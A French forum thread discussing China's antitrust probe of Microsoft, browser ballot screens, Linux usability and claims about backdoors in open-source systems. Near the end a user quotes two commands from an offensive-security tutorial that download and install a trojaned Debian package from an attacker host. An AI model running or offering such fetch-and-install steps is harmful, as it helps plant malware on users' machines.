Discussion :

[imikado]

Pour les navigateurs, le ballot screen a beaucoup aidé, la preuve sa suspension fut néfaste pour Mozilla

Mozilla estime qu'en ayant désactivé le ballot screen pendant 15 mois, Microsoft lui a causé la perte de 6 à 9 millions de téléchargements de Firefox sous Windows.

Et

Alors que le navigateur comptait un peu plus de 50 000 téléchargements par jour avant la suppression du ballot screen dans Windows 7 SP1, le chiffre a progressivement baissé de 63 %, pour ne plus représenter que 20 000 téléchargements quotidiens. Lorsque le problème a été corrigé en juillet 2012, les téléchargements ont explosé de 150 %.

CQFD

[stardeath]

depuis quand les téléchargements montrent le taux d'utilisation d'un soft sur le marché?

démonstration échouée, try again.

[Pierre GIRARD]

C'est bien connu, les gens chargent Mozilla 10 fois par jour ... rien que pour le mettre à la poubelle ensuite.

[stardeath]

bah je sais pas, je me suis dis que ça pourrait être drôle d'aller pour une fois voir des stats counters vu qu'on m'en met souvent face à moi pour me prouver des choses (et que bizarrement pour une fois, on ne s'en sert pas comme preuve, suspicieux comme je suis, ça a valu le coup )
si je les suis, firefox descendait déjà avant et n'a pas remonté ensuite, au contraire de chrome qui n'a jamais arrêté d'augmenter, et opera n'a pas bougé.
après je trouve ça pourri les stats counters, je ne m'en servirai pas comme preuve, mais là, à moins que mozilla soit payé aux téléchargements, ça ne prouve rien du tout, désolé.

donc je redemande, en quoi les téléchargements montrent le taux d'utilisation d'un soft?

ps: ça va montrer au moins une chose, soit les stats counters, on peut s'y fier, et donc mettre à mal l'argument de mozilla; soit c'est de l'info pas fiable, et donc comment mozilla fait pour établir un lien entre téléchargements et utilisation.
le taux d'update du navigateur serait un bon indicateur je pense, il montrerait plus un taux d'utilisation et de mise à jour, quelqu'un à des chiffres là dessus?

[Pierre GIRARD]

De toutes les façons, les stats counters sont faux dans la mesure où un utilisateur Opera ou Mozilla (je ne sais pas pour Chrome) peut se faire passer pour un IE et est donc compté comme un IE. En tout cas, c'est ce qui m'a été répondu lorsque j'avais posé la question sur le fil des navigateurs.

En revanche, je ne suis pas certain qu'un utilisateur IE ai la possibilité de se faire passer pour Mozilla, Opera ou Chrome.

Donc stats faussées à la base.

[simon45]

a) Oui la chine peut toujours essayer des sanctions, mais quelle solution proposent-ils afin de ne pas utiliser WINDOWS ? a noter que les constructeurs chinois sont les premiers à installer l'OS sur leur produit.

b) le protectionnisme pour la chine, ce n'est pas une nouveauté...

pour les autres commentaires, combien d'utilisateurs de PC sont des informaticiens ? ou on des notions d'informatique ?

[bumblee]

Je réfute toute idée que Linux n'est pas facilement utilisable par un utilisateur néophyte. Mon premier ordinateur, j'avais 8 ans, a été un notebook avec ubuntu 8.04. Déjà à l'époque, on pouvait utiliser ubuntu quotidiennement sans jamais utiliser le ligne de commande : en fait, je ne savais même pas que ça existait.

[Haseo86]

En fait Linux est même plus facile à utiliser pour un néophyte total que pour quelqu'un qui a l'habitude d'utiliser des PCs sous Windows, parce qu'il doit perdre ses habitudes et automatismes. De même que quelqu'un qui a toujours utilisé uniquement Linux sera perdu en découvrant Windows.

Après il y a des critères plus ou moins objectifs qui permettent de se faire une idée : il y a des gens qui ont toujours été gênés par le fait de cliquer sur "démarrer" pour arrêter la machine, ou avec Windows 8 le coup des "talismans" qui n'ont aucun sens dans un environnement de bureau. De même que certains ne se sont jamais fait à la barre de fenêtre globale façon Ubuntu (Unity) ou façon MacOS.

Pour ma part j'ai "grandi" en utilisant Windows, j'ai découvert Linux début des années 2000, j'ai une très très large préférence pour Linux (que ce soit Unity, Cinnamon, Gnome 3, Pantheon... ), et j'ai eu énormément de mal le temps ou j'ai dû par obligation travailler sous MacOS X.

[Stéphane le calme]

La Chine étend son enquête antitrust à l'endroit de Microsoft ,
Internet Explorer et Media Player désormais sous son collimateur

En juillet dernier, la Chine confirmait l’ouverture d’une enquête antitrust à l’endroit de Microsoft, soupçonné d’infractions à la législation à la concurrence. L’objet de l’enquête était le système d’exploitation de Redmond ainsi que les logiciels de sa gamme Windows Office qui permettent à Microsoft de « contrôler à lui seul 95 % de parts de marché en Chine » selon le journal financier Meiri Jingji Xinwen qui faisait état de « monopole de fait ».

La Chine rallonge la liste des cibles de son enquête en indexant également la distribution d’Internet Explorer mais aussi du lecteur Windows Media Player, comme l’a indiqué ce mardi le chef de l’autorité de la concurrence chargé des investigations. L’américain est soupçonné de pratiques « problématiques » dans la distribution de ces logiciels, a affirmé la Chine sans apporter plus de détails.

Redmond a assuré collaborer pleinement avec les autorités chinoises dans cette enquête. Pourtant, Zhang Mao, le patron de la SAIC (Administration d'Etat pour l'industrie et le commerce), a déploré le fait que « Microsoft est soupçonné de n'avoir pas fourni des informations complètes ». Cependant, il reconnaît la coopération de Redmond : « dans nos contacts répétés avec Microsoft, de hauts dirigeants (du groupe) ont fait part de leur respect pour les lois chinoises et ils coopèrent à l'enquête ».

Pour rappel, Microsoft avait déjà fait l’objet d’une telle enquête en Europe qui s’est soldée par des éditions N de Windows n'intégrant pas une copie du lecteur Windows Media, mais également la possibilité offerte à l’utilisateur de déterminer son navigateur Web par défaut depuis un écran lui présentant ses options. En mars 2013, Microsoft s'était vu infliger une amende de 561 millions d'euros par la Commission européenne pour ne pas avoir respecté ses engagements envers Bruxelles, concernant le choix des navigateurs offert sur son système d'exploitation Windows 7.

Microsoft n'est pas le seul groupe visé par une enquête antitrust en Chine. C'est par exemple également le cas du fabricant de puces Qualcomm ainsi que d'autres groupes étrangers, notamment dans les secteurs pharmaceutique, agroalimentaire et automobile.

Source : the reuters

Et vous ?

Qu'en pensez-vous ?

[redcurve]

Même si je désapprouve la forme utilisée par GTSLASH, je dois bien avouer que sur le fond, je suis en partie d'accord avec lui.

Je pense que cela est en train de changer (la dernière fois que j'ai testé du Linux (c'était Debian), ça remonte à mes études) mais il faut quand même bien avouer que l'utilisation de Linux n'est pas à la portée de Mme Michu. Je me souviens à l'époque avoir voulu lire un cd avec Debian. J'insère donc le CD dans le lecteur et puis là, c'est le drame. Pas moyen de le trouver. Evidemment, il fallait faire un mount. Vous imaginez Mme. Michu faire un mount pour pouvoir lire son cd ? Déjà moi à l'époque je ne savais pas ce que c'était...

Sur base de ce fait, si j'étais constructeur (disons HP par exemple), je ne commercialiserais pas de machines avec Linux pré-installé au Carrefour du coin. Je ne dis pas que Linux est à la ramasse au niveau fonctionnel par rapport à Windows mais il faut quand même reconnaître que Windows est bien plus userfriendly. Et pour le consommateur lambda, c'est cela qui compte ! Et donc pour le constructeur aussi vu qu'il dépend du consommateur pour faire tourner son business.

Je ne rentrerai dans le débat des formats ouverts versus fermés et de MS Office versus Libre/OpenOffice.

Sans compter qu'un ordi sous linux est forcément plus cher, car quand un assembleur fournit du linux sur un ordi il doit aussi se taper la maintenance (embaucher du monde, etc.) bref faire un métier qui n'est pas le sien. Tu ne peux pas vendre un produit en disant ouais mais non y'a aucun support. Ce cas s'est déjà présenté par exemple chez Dell et d'autres, qui devaient facturer le cout de maintenant de l'OS, là ou sous Windows c'est Microsoft qui gère cette problématique.

Ce point est très souvent négligé (mauvaise foi ?), par les pro linux.

[redcurve]

http://www.microsoft.com/en-us/share...y-program.aspx

après faut avoir confiance en ton gouvernement, mais le code source d'au moins windows n'est pas si secret que ça.

Il n'est pas publique mais pas secret non plus, des milliers de personnes ont accès aux sources de Windows en dehors de Microsoft et pas que des gouvernements

[redcurve]

Oui j'utilise l'OpenSource j'ai jamais dis le contraire. Et comme dis dans les postes précédents j’utiliserai meme OpenSuse si je pouvais y installer VisualStudio car l'interface d'OpenSuse me plait bien. Et c'est gratuit, faut pas nier que ca rentre en compte dans certain cas. Et les Live CD/USB c'est tres pratique.

Mais je n'audite pas le code source d'entity framework j'en vois pas l'interet. L'OpenSource est une bonne solution si il y a derrière une societé qui mes les moyens financier pour donner une garantie (Microsoft pour Entity Framework, Google pour AngularJS qui sont tous les 2 d’excellente solution) J'utilise également beaucoup Prism qui est également OpenSource il me semble.

Je n'audite pas les librairie, je les utilises. Comme je reste dans du Microsoft la plupart du temps je considère qu' Entity framework fait partie de .Net et donc de Windows et est donc de la responsabilité de Microsoft. Je test mes programmes en fonction du cahier des charges et c'est déjà bien suffisant. On ne m'a jamais demander d'auditer EF pour voir si il n'y avait pas de faille de sécurité dedans. Et je vois pas pourquoi je le ferai. C'est pas ce qu'on me demande. Microsoft l'a déjà fais.

Si dans le cahier des charge on me demande une solution NSA-Proof je répondrai simplement que c'est impossible. Et c'est le cas. C'est de l'arnaque de faire payer des milliers d'euro a des clients et leur faire croire ça.

Je ne vend pas Windows ou SQL Server. Ces produits sont des pré-requis que j'utilise dans mes programmes c'est tous. Et Microsoft beneficie de la confiance de beaucoup de société donc personne ne m'a jamais demandé de vérifier le travail de Microsoft. Je teste et si ca correspond au cahier des charges je livre.

Ce que je dis c'est que dire que Linux et l'OpenSource est plus secure que Windows mais qu’après on se rend compte que même OpenSSL n'a pas été audité c'est de l'arnaque. Dans la théorie oui, si il y a le code source on peut trouver les vulnérabilité plus facilement (et donc aussi les rendre public et donc exploitable). Mais dans la pratique ça ne se fait pas par manque de moyens.

D'ailleurs je réfléchi de plus en plus a vendre le code source des mes programmes avec le programmes pour des raison de dépendance de mes clients par rapport a moi. Sans qu'ils puissent le redistribuer. A un autre prix évidement.

En réalité, il est impossible d'auditer réellement des logiciels aussi poussé que Windows, une distrib linux, ou sql server par exemple. La masse de code est si grande que sa compréhension ne peut être faire par une seule personne. C'est pour ça que par exemple nos propre militaire ont dit "Rien à foutre open source ou pas de toute façon c'est si complexe que personne ne peut vérifier ce qui se passe".

Un exemple simple on a vu la levée de bouclier suite à snowden concernant SE Linux, conçu par la NSA et complètement open source. La raison était "Il est impossible d'auditer le code de SE Linux, et de Linux car trop complexe" ce qui confirme bien ce que je disais plus haut.

[GHetfield]

En réalité, il est impossible d'auditer réellement des logiciels aussi poussé que Windows, une distrib linux, ou sql server par exemple

Je suis tout a fait d’accord. Dire le contraire est prétentieux et de mauvaise fois. Et en faire l'argument principale d'une technologie est une vrai arnaque.

Et concernant les Backdoor "impossible" sous Linux :

http://researchcenter.paloaltonetwor...isk-intrusion/

[redcurve]

Je suis tout a fait d’accord. Dire le contraire est prétentieux et de mauvaise fois. Et en faire l'argument principale d'une technologie est une vrai arnaque.

Et concernant les Backdoor "impossible" sous Linux :

http://researchcenter.paloaltonetwor...isk-intrusion/

Au bout d'un moment un système (je ne parle pas forcément informatique) lorsqu'il atteint un certain niveau de complexité n'est plus maitrisable par une seule personne, pire même un groupe de personnes tout à fait aguerries ne perçois qu'une fraction du fonctionnement du dit système.

Alors dire on va auditer truc muche, machin bidule est une grosse blague, en fait ça concise à tester une série d'attaques et de techniques connu via très souvent des outils déjà tout prêt. Ainsi que des tests en boite noir et boite blanche quand c'est possible..
Sinon il faudrait 1000 ans pour faire le job et encore l'entropie induite par des langages comme C/C++ massivement utilisés par nos OS, fait que pour une même instruction le comportement n'est pas forcément le même , puis il y a l'entropie induite par les CPU etc. bref un gros bordel.

L'entropie pourrait être réduite, mais il faudrait utiliser que des entiers et encore ...

Je me souviens avoir checker le code de Bind, suite au méga gros bordel, du au fait que les devs levaient une exception pour avoir un entier aléatoire (utilisation de l'entropie) pour faire j'sais plus quoi (dsl j'ai oublié). Ce qui induisait une vulnérabilité bien profonde dans le système du fait, que les OS utilisent massivement la mémoire partagée .

[imikado]

Je suis tout a fait d’accord. Dire le contraire est prétentieux et de mauvaise fois. Et en faire l'argument principale d'une technologie est une vrai arnaque.

Et concernant les Backdoor "impossible" sous Linux :

http://researchcenter.paloaltonetwor...isk-intrusion/

Il faut lire en entier, sur le même site, plus bas:

The headline is misleading suggesting there is a so called “backdoor” in iptables (aka netfilter).
This particular malware is is a simple trojan that suggests it might be iptables, a very thinly veiled masquerade that should get the attention of any marginally experienced linux administration give that legitimate programs are never named with a dot (I haven’t seen one in nearly 20 years working with *nix) and iptables doesn’t run as a process

[GHetfield]

Et ? Les systèmes Linux sont aussi vulnérable et peuvent tout aussi bien être piraté. Malgré ce que vous dite.

http://threatpost.com/ubuntu-package...t-091509/72289

http://www.offensive-security.com/me...y_Linux_Trojan

[Alcore]

Et ? Les systèmes Linux sont aussi vulnérable et peuvent tout aussi bien être piraté. Malgré ce que vous dite.

http://threatpost.com/ubuntu-package...t-091509/72289

http://www.offensive-security.com/me...y_Linux_Trojan

As tu seulement regardé les liens que tu propose ou as tu juste tapé linux backdoor sur Google pour donner un semblant de crédit a ton post?

Le premier liens montre comment mettre en place un kit du parfait petit pirate en quelque sorte. Cela implique néanmoins s que la victime télécharge l'appli depuis un repo non officiel! Ce n'est pas une démonstration de backdoor dans linux.


Idem pour le deuxième lien:

On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.

ubuntu@ubuntu:~$ wget http://192.168.1.101/freesweep.deb

ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb

Ces deux liens montrent juste qu'il est possible de faire télécharger des applications malveillantes a certains tiers naïfs. Le code téléchargé n'est ni open source, ni exploitable a grande échelle et n'est signe par aucune clé numérique.


Aucunement une preuve de l'existence d'un backdoor dans linux.

[GHetfield]

Ce n'est pas une démonstration de backdoor dans linux.

Oui ce sont des trojan.

[GHetfield]

Il y en a aussi dans les distributions officiel :

http://www.zdnet.com/blog/bott/linux...r-updated/2206

According to this report, the malware-compromised code was included in the official Gentoo distribution:"

http://techrights.org/2014/01/17/rhel-security/



Et de toute façon :

http://www.democraticunderground.com/10023377711

Tous ça pour dire qu'il y en a partout. Rien ne sert de passer des heures et des heures a auditer inutilement

[Alcore]

Oui ce sont des trojan.

Qu'un user a du volontairement télécharger... Bref tu viens juste de montrer qu'il est possible de coder et distribuer un virus sous une distribution linux. Ce fait n'a jamais été dementi et il n'y aura jamais une sécurité suffisante contre des users neuneu.

Ton dernier lien pareil:

The Gentoo bug report (warning: Gentoo's certificate does not resolve to a trusted Certifying Authority) reports that it is VERIFIED and CLOSED with this comment:

The unrealircd taball in the gentoo mirrors _is_ affected ( Unreal3.2.8.1.tar.gz ) but the Manifest file's signatures match the _unaffected_ tarball. This discrepancy is how the backdoor was discovered